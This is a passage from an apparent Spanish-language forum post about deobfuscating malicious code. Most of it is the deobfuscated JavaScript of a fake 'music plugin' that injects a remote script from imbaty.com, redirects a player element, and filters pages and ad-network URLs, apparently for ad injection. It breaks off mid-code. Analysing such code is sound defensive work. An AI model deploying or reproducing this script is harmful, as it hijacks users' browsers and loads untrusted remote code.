2) puede ser dificilmente desofuscado determinando 2 o 3 variables, para ello te sugiero
pd:menos mal que no era php, pero si lo fuera normalmente se evaluan Eval con echo y otros desofuscadores de exploit como
var loc = (location['href']['match'](/^http:\/\/(www\.)?taringamp3\.com/i)); {
if (document['getElementById']('reproductor')) {
if (document['getElementById']('reproductor')['src']['match'](/instalar-plugin/i)) {
document['getElementById']('reproductor')['src'] = 'xat.php';
};
};
};
var LugaroPluginMusic_url = '
http://imbaty.com/plugins/otros.js';var LugaroPluginMusic_version = '3.0';
var a = document['createElement']('script');
a['type'] = 'text/javascript';
a['async'] = true;
a['src'] = LugaroPluginMusic_url;
var s = document['getElementsByTagName']('script')[0];
s['parentNode']['insertBefore'](a, s);
var n = document['createElement']('div');
n['id'] = 'Taringamp3_ok';
n['setAttribute']('version', LugaroPluginMusic_version);
n['setAttribute']('active', 'on');
document['body']['appendChild'](n);
function validHost() {
if (location['href']['match'](/taringamp3\.com/i)) {
return false;
} else {
if (location['href']['match'](/compartirchistes\.com/i)) {
return false;
} else {
if (location['href']['match'](/descargaralbum\.com/i)) {
return false;
} else {
if (location['href']['match'](/taquilladivx\.org/i)) {
return false;
} else {
if (location['href']['match'](/buscadorares\.com/i)) {
return false;
} else {
if (location['href']['match'](/imbaty\.com/i)) {
return false;
} else {
if (location['href']['match'](/encuestasonline\.net/i)) {
return false;
} else {
if (location['href']['match'](/solopeliculasonline\.com/i)) {
return false;
} else {
if (location['href']['match'](/frasesxd\.com/i)) {
return false;
} else {
if (location['href']['match'](/juegosopqa\.com/i)) {
return false;
} else {
if (location['href']['match'](/sonidodance\.net/i)) {
return false;
} else {
if (location['href']['match'](/ver-imagenes\.com/i)) {
return false;
} else {
return true;
};
};
};
};
};
};
};
};
};
};
};
};
};
function validAds(_0x94eax9) {
if (_0x94eax9['match']('^http://adserving.cpxinteractive.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('https://')) {
return true;
} else {
if (_0x94eax9['match']('
http://www.')) {
return true;
} else {
if (_0x94eax9['match']('ad.smowtion.com')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.smowtion.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.adnetwork.net/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.foxnetworks.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.xtendmedia.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.harrenmedianetwork.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.metanetwork.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.blinkdr.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.z5x.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.adfunky.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ads.creafi-online-media.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.jumbaexchange.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ads.avazu.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.yieldads.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.adnetinteractive.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.bannerconnect.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ads.jumbaexchange.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.e-viral.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ads.tlvmedia.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.adperium.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ads.jumbaexchange.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://go.cpmadvisors.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.xertive.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.media-servers.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://go.cpmadvisors.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.globe7.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.103092804.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.globaltakeoff.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ads.bluelithium.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.antventure.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.reduxmedia.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.adtegrity.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.directaclick.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('.mediashakers.com/id')) {
return true;
} else {
if (_0x94eax9['match']('
http://ad.adserverplus.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('^http://ad.yieldmanager.com/st?')) {
return true;
} else {
if (_0x94eax9['match']('tradex.openx.com/afr.php?')) {
return true;
} else {
if (_0x94eax9['match']('.affiz.com/tracking/iframedfp.php')) {
return true;
} else {
if (_0x94eax9['match']('adserver.itsfogo.com/')) {
return true;
} else {
if (_0x94eax9['match']('.pasadserver.com/showBanner.php')) {
return true;
} else {
if (_0x94eax9['match']('ads.lfstmedia.com/slot')) {
return true;
} else {
if (_0x94eax9['match']('ads.sonicomusica.com/ad')) {
return true;
} else {
if (_0x94eax9['match']('ads.adpv.com/iframe')) {
return true;
} else {
if (_0x94eax9['match']('adserver.adtechus.com/adiframe')) {
return true;
} else {
if (_0x94eax9['match']('mooxar.info/openx/')) {
return true;
} else {
if (_0x94eax9['match']('bs.serving-sys.com/BurstingPipe')) {
&nb